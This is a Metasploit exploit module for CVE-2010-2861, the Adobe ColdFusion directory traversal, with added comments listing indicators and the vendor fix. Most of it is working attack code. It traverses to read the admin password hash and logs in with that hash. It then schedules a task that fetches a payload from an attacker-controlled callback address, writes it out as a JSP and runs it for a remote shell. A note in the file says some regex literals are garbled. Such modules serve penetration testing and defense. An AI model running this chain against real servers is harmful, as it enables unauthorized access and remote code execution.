
# Title : Adobe ColdFusion - Directory Traversal
# Published : 2011-03-16
# Author : metasploit


##
# $Id: coldfusion_traversal.rb 11974 2011-03-16 01:38:16Z mc $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

##
# Metasploit module for CVE-2010-2861 (Adobe ColdFusion directory traversal,
# fixed by Adobe bulletin APSB10-18 referenced below). Read as a defender, the
# code below documents the full chain this module performs and therefore the
# artifacts it leaves:
#
#   1. GET <URL>enter.cfm?locale=../../..(repeated)../lib/password.properties%00en
#      until a response body contains a 40-hex-digit string (the stored admin
#      password hash). Each failed attempt shortens the traversal by one
#      "../" segment, so a vulnerable host sees a short burst of such requests.
#   2. POST to enter.cfm with cfadminPassword=HMAC-SHA1(salt, hash) and the
#      same salt. The stored hash alone is sufficient to log in, so once
#      password.properties has been exposed the hash must be treated as a
#      compromised credential and the administrator password rotated.
#   3. GET settings/mappings.cfm to learn the web root path and OS.
#   4. POST scheduler/scheduleedit.cfm creating a one-off task named
#      "wD-<6 random alphanumerics>" whose ScheduledURL is this module's own
#      listener (CBIP:SRVPORT/URIPATH) and whose response is published to
#      "<webroot>/wD-<6 random alphanumerics>.jsp". The server therefore makes
#      an outbound HTTP request to the attacker-controlled address.
#   5. The listener serves the Java payload; the module then requests
#      /CFIDE/<that JSP> to execute it.
#
# Scheduled tasks with a "wD-" prefix, JSP files dropped under /CFIDE, and the
# traversal pattern in the locale parameter are all concrete indicators for
# log review on hosts that were exposed before patching.
#
# NOTE(review): several regex and string literals in this copy of the listing
# (the loop condition, the gsub patterns, a commented-out regex) appear to be
# transcription-damaged and are not expected to parse as printed; treat this
# text as a reference listing, not a runnable file, and compare against the
# upstream module before drawing conclusions from those lines.
##
class Metasploit3 < Msf::Exploit::Remote
	# Framework reliability ranking for this module.
	Rank = NormalRanking

	# HttpServer::HTML: the module hosts a listener the target is made to
	# connect back to (on_request_uri below).
	# HttpClient: send_request_raw / send_request_cgi / rport used in exploit.
	include Msf::Exploit::Remote::HttpServer::HTML
	include Msf::Exploit::Remote::HttpClient

	# Registers module metadata and the user-facing options.
	#
	# @param info [Hash] metadata merged by update_info
	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'Adobe ColdFusion - Directory Traversal',
			'Description'    => %q{
					This module exploits a directory traversal bug in Adobe ColdFusion.
				By reading the password.properties a user can login using the encrypted 
				password itself. This should work on version 8 and below.
			},
			'License'        => MSF_LICENSE,
			'Author'         => [ 'webDEViL' ],
			'Version'        => '$Revision: 11974 $',
			'References'     =>
				[
					[ 'CVE', '2010-2861' ],
					[ 'URL', 'http://www.procheckup.com/vulnerability_manager/vulnerabilities/pr10-07' ],
					# Vendor fix: applying this bulletin is the mitigation for the chain above.
					[ 'URL', 'http://www.adobe.com/support/security/bulletins/apsb10-18.html' ],
				],
			'Privileged'   	=> true,
			'Platform'      => ['linux','windows'],
			# Aggressive: the module both connects to the target and runs a listener.
			'Stance'       	=> Msf::Exploit::Stance::Aggressive,
			'Targets'       =>
				[
					[ 'Universal',
						{
							# Payload is a Java (JSP) stage, hence OS-independent target.
							'Arch' => ARCH_JAVA,
							'Payload' => 'java'
						}
					],
				],
			'DisclosureDate' => 'Aug 25 2010',
			'DefaultTarget'  => 0))

		register_options(
			[
				# 'automatic' is replaced by the OS-detection step in exploit.
				OptString.new('SHELL', [ true, "The system shell to use.", 'automatic']),
				# Administrator directory; restricting network access to it is a
				# common hardening measure independent of the vendor patch.
				OptString.new('URL',   [ true, 'Administrator Directory', '/CFIDE/administrator/' ]),
				# Address the ColdFusion server is made to connect back to (step 4 above).
				OptString.new('CBIP',  [ true, 'Connect Back IP (even when not using reverse shell)', nil ]),
				# Optional explicit traversal path; when nil the loop in exploit probes for it.
				OptString.new('TRAV',  [ false, 'Location of the password.properties file eg. 
../../../../ColdFusion8/lib/password.properties%00en', nil ]),
			], self.class)
	end

	# Runs steps 1-4 of the chain described in the class header, then hands
	# control to the HttpServer mixin via super so the listener can serve the
	# payload when the scheduled task fires.
	#
	# Returns early (nil) when no hash is found or the mappings page cannot be
	# fetched. Note that a failed login (no Set-Cookie match) is only reported,
	# not treated as fatal: `session` stays nil and the later requests are
	# still sent with an empty cookie value.
	def exploit

		ip = datastore['RHOST']
		url = datastore['URL']+"enter.cfm"
		locale = "?locale="
		# Default probe: 22 "../" segments followed by lib/password.properties and a
		# %00en suffix (presumably to satisfy the locale-file handling - confirm).
		trav = datastore['TRAV'] || "../../../../../../../../../../../../../../../../../../../../../../lib/password.properties%00en"
		# Randomised JSP name and listener path; both are stored in the datastore
		# so on_request_uri can read them back.
		datastore['JSP'] = "wD-"+rand_text_alphanumeric(6)+".jsp"
		datastore['URIPATH'] = rand_text_alphanumeric(6)

		print_status("Trying to acheive Directory Traversal...")
		# Loop while the traversal string still contains a parent-directory
		# segment (regex literal appears damaged in this copy - see class header).
		while trav.match(/..///im)
			# Second argument is the HttpClient timeout (-1 here).
			res = send_request_raw({
				'uri'     => url+locale+trav,
				'method'  => 'GET',
				'headers' =>
					{
						'Connection' => "keep-alive",
						'Accept-Encoding' => "zip,deflate",
					},
				}, -1)

			if (res.nil?)
				print_error("no response for #{ip}:#{rport} #{url}")
			elsif (res.code == 200)
				#print_error("#{res.body}")#debug

				# A 40-hex-digit token in the body is taken as the admin hash
				# (SHA-1 sized). This is the only place caphash is assigned.
				if match = res.body.match(/([0-9A-F]{40})/im);
					caphash = $1
					print_status("URL: #{ip}#{url}?locale=#{trav}")
					print_status("Admin Hash: " + caphash)
					break
				else
					#select(nil, nil, nil, 3)
					# Drop one "../" (3 chars) and retry with a shorter traversal.
					trav=trav[3..-1]
					print_status("Trav:"+trav)
				end
			else
				''
			end
		end

		# caphash is nil when the loop exhausted the traversal without a match.
		if caphash.nil?
			print_error("Could not determine location of password.properties file, Set TRAV option manually")
			print_error("OR ColdFusion is not vulnerable")
			return
		end

		# Login: salt = epoch seconds + "123"; cfadminPassword = HMAC-SHA1 keyed
		# with the salt over the stored hash (hex, upper-case). Presumably this
		# mirrors what the login page's client-side code computes - confirm.
		# Defensive takeaway: the stored hash is password-equivalent here.
		keyz = Time.now.to_i.to_s+"123"
		print_status("Time: "+ keyz)
		loghash= OpenSSL::HMAC.digest(OpenSSL::Digest::Digest.new('sha1'), keyz, caphash).unpack('H*')[0].upcase
		print_status("Login Hash: "+loghash)

		params =  'cfadminPassword='+loghash
		params << '&requestedURL=%2FCFIDE%2Fadministrator%2Fenter.cfm%3F&'
		params << 'salt='+keyz
		params << '&submit=Login'
		res = send_request_cgi({
			'method'    => 'POST',
			'uri'       => url,
			'data'  => params
		})
		if (res)
			#print_status("Me want Cookie: "+ res.headers['Set-Cookie'])
			# First 20-200 char alphanumeric run in Set-Cookie is used as the
			# CFAUTHORIZATION_cfadmin session value for every later request.
			if (res.headers['Set-Cookie'].match(/([A-Za-z0-9]{20,200})/im);)
				session = $1
				print_status("Cookie: #{session}")
			else
				print_error("Error retrieving cookie!")
			end
		else
			print_error("No response received while logging in.")
		end
		print_status("Attempting to automatically detect the platform...")
		##AUTO_DETECT START
		# The mappings page lists the CFIDE directory; the path string is used
		# to infer the OS and the web root the JSP will be written to.
		path = datastore['URL'] + 'settings/mappings.cfm'
		res = send_request_raw(
			{
				'uri'    => path,
				'headers' =>
					{
						'Cookie'     => "CFAUTHORIZATION_cfadmin=#{session}"
					}
			}, 20)
		if (not res) or (res.code != 200)
			print_error("Failed: Error requesting #{path}")
			return nil
		end
		if (res.body.match(/.*td *>(.*CFIDE&nbsp;)/im);)
			os = $1
			os.match(/<td [^>]*?>(.*)&nbsp/im);
			os1 =$1
			# Whitespace stripping (patterns appear damaged in this copy - see class header).
			os1 = os1.gsub("/t", '')
			os1 = os1.gsub("/r/n", '')
			# A ':' in the path (drive letter) is taken to mean Windows.
			if (os1 =~ /:/i) #haha ;)
				print_status('OS: Windows')
				datastore['SHELL'] = 'cmd.exe'
				os1=os1+"//"
			else #(os1 =~ ////i)
				print_status('OS: Linux')
				datastore['SHELL'] = '/bin/sh'
				os1=os1+"/"
			end
			print_status("Web Directory:"+os1)
		end
		##AUTO_DETECT END
		# Fetch the "new task" form to read the server-side default date/time,
		# since the attacker's local clock cannot be used (see commented lines below).
		res = send_request_raw(
			{
				'uri'     => "/CFIDE/administrator/scheduler/scheduleedit.cfm?submit=Schedule+New+Task",
				'method'  => 'GET',
				'headers' =>
					{
						'Cookie'     => "CFAUTHORIZATION_cfadmin=#{session}",
					}
			}, 25)
		if (res.body.match(/<input name="StartTimeOnce".*?value="(.*?)">/im);)
			start_time = $1
		end
		if (res.body.match(/<input name="Start_Date".*?value="(.*?)" id="Start_Date">/im);)
			start_date = $1
		end
		#else FAIL!
		# Server time shifted back 19 minutes so the one-off task is already due.
		# NOTE(review): DateTime#advance is not core Ruby - presumably ActiveSupport
		# loaded elsewhere by the framework; confirm.
		comb = start_date + start_time
		fmt = "%b %d, %Y%I:%M %p"
		comb = ((DateTime.strptime(comb,fmt)).advance :minutes =>-19)
		t = comb.strftime("%b %d, %Y")
		t1 = comb.strftime("%I:%M %p")
		#t=(Time.now).strftime("%b %d, %Y") #can't use local time
		#t1=(Time.now + 5).strftime("%I:%M:%S %p")
		# Scheduled task body. Indicators for defenders: TaskName "wD-..." prefix,
		# ScheduledURL pointing off-host to CBIP:SRVPORT, publish=1 with a
		# publish_file ending in ".jsp" under the web root.
		params =  'TaskName=wD-'+rand_text_alphanumeric(6)
		params << "&Start_Date=#{t}" #Mar+12%2C+2011
		params << '&End_Date=&ScheduleType=Once'
		params << "&StartTimeOnce=#{t1}" #6%3A40+PM
		params << ' &Interval=Daily&StartTimeDWM=&customInterval_hour=0&customInterval_min=0&customInterval_sec=0&CustomStartTime=&CustomEndTime=&Operation=HTTPRequest'
		params << '&ScheduledURL=http%3A%2F%2F'+datastore['CBIP']+":"+datastore['SRVPORT']+"/"+datastore['URIPATH']
		params << '&Username=&Password=&Request_Time_out=&proxy_server=&http_proxy_port=&publish=1'
		params << '&publish_file='+os1+datastore['JSP']
		params << '&adminsubmit=Submit&taskNameOrig='

		res = send_request_raw(
			{
				'uri'     => "/CFIDE/administrator/scheduler/scheduleedit.cfm",
				'method'  => 'POST',
				'data'    => params,
				'headers' =>
					{
						'Content-Type'   => 'application/x-www-form-urlencoded',
						'Content-Length' => params.length,
						'Cookie'     => "CFAUTHORIZATION_cfadmin=#{session}",
					}
			}, 25)
		#print_error("#{res.body}")
		# Hand over to the HttpServer mixin, which presumably starts the listener
		# and waits for the scheduled task to call back (confirm in framework).
		super
	end

	# HttpServer callback: invoked when the listener receives a request for
	# URIPATH, i.e. when the ColdFusion scheduler fetches ScheduledURL.
	# Serves the encoded Java payload (which the task publishes as the JSP),
	# then requests that JSP on the target to execute it.
	#
	# @param cli     the connected client (the ColdFusion server)
	# @param request the incoming HTTP request (unused here)
	def on_request_uri(cli, request)
		p = regenerate_payload(cli)
		#print_status("SHELL set to #{datastore['SHELL']}")
		#print_status((p.encoded).to_s)

		print_status("Sending exploit to #{cli.peerhost}:#{cli.peerport}...")
		# Transmit the response to the client
		send_response(cli, p.encoded, { 'Content-Type' => 'text/html' })
		# Trigger the published JSP; the response itself is not inspected.
		res = send_request_raw(
			{
				'uri'     => "/CFIDE/"+datastore['JSP'],
				'method'  => 'GET',
			}, 25)
		# Handle the payload
		handler(cli)
	end
end